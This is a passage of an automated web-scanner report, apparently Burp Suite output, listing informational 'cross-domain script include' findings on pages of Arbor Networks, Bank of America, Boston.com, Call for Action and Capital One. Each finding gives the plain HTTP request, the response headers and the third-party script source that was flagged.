<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.118. http://www.arbornetworks.com/privacy_policy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /privacy_policy.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy_policy.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d03675f1bdd2a9f032c75f15aeef59a8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.119. http://www.arbornetworks.com/report  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /report

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /report HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:36:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:36:01 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:36:01 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:36:02 GMT; path=/
Set-Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:36:02 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.120. https://www.arbornetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=b1cd9acc8320405ae0ba3cb0a133c3f9; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.121. https://www.arbornetworks.com/en/lost-password-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/lost-password-3.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=2893ab73ba553c847b7da80617b1ab85; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:58 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:58 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.122. https://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=731c462d215cdaa4529663bbfc9a90f0; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.123. http://www.bankofamerica.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /index.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.cfm?page=corp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:18 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131847850; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=18f90e%2D000aada8%2Dd4a6%2D1d49%2D98e7%2D83689ffb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/


                                                                                               <tr valign="top">

   
       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http
...[SNIP]...
<br />


<script language="JavaScript" src="http://www.ethnio.com/app/screener/jss.php?scid=796_1708" type="text/javascript"></script>
...[SNIP]...

17.124. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:30 GMT
Server: Apache/2.2.13 (Unix)
Set-Cookie: pathCnt=1; path=/; domain=.boston.com
Accept-Ranges: bytes
Served-By: rebecca
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 08-Jan-2016 01:06:30 GMT;path=/;domain=boston.com;
Content-Length: 40252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- Need for HL -->
<script language="JavaScript"><!--

var trustedT
...[SNIP]...
</ul>
<script src="http://w.sharethis.com/button/sharethis.js#publisher=e1e0ea5a-a326-4731-b1d1-f21623043511&amp;type=website&amp;button=false" type="text/javascript"></script>
...[SNIP]...

17.125. http://www.callforaction.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.callforaction.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.callforaction.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:48 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 mod_fastcgi/2.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 SVN/1.4.2
X-Powered-By: PHP/5.1.6
X-Pingback: http://76.12.60.2/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<meta name="generator" content="WordPress 2.8.4" />
<script type="text/javascript" src="http://76.12.60.2/wp-content/plugins/audio-player/assets/audio-player.js?ver=20080825040617"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://76.12.60.2/wp-content/plugins/flash-video-player/swfobject.js"></script>
...[SNIP]...

17.126. http://www.capitalone.com/smallbusiness/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 59681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse our small business banking products includin
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://switch.atdmt.com/jaction/COSB_HP_INDEX_4/v3/atz.FBBE6C4A1C9B8436"></script>
...[SNIP]...

17.127. http://www.capitalone.com/smallbusiness/business-money-market/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/business-money-market/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smallbusiness/business-money-market/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:00 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 60850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://view.atdmt.com/jaction/nyccps_NDB_BMM/v3/atz.FBBE6C4A1C9B8436"></script>
...[SNIP]...

17.128. http://www.capitalone.com/smallbusiness/cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smallbusiness/cards/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:53 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://view.atdmt.com/jaction/nyccos_COSB0125mainpage_1/v3/atz.FBBE6C4A1C9B8436"></script>
...[SNIP]...

17.129. http://www.capitalone.com/smallbusiness/cards/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smallbusiness/cards/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:57 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://view.atdmt.com/jaction/nyccos_COSB0125mainpage_1/v3/atz.FBBE6C4A1C9B8436"></script>
...[SNIP]...

17.130. http://www.capitalone.com/smallbusiness/payroll/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/payroll/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smallbusiness/payroll/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 49209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k
...[SNIP]...
<!-- For Atlas DMT -->

   
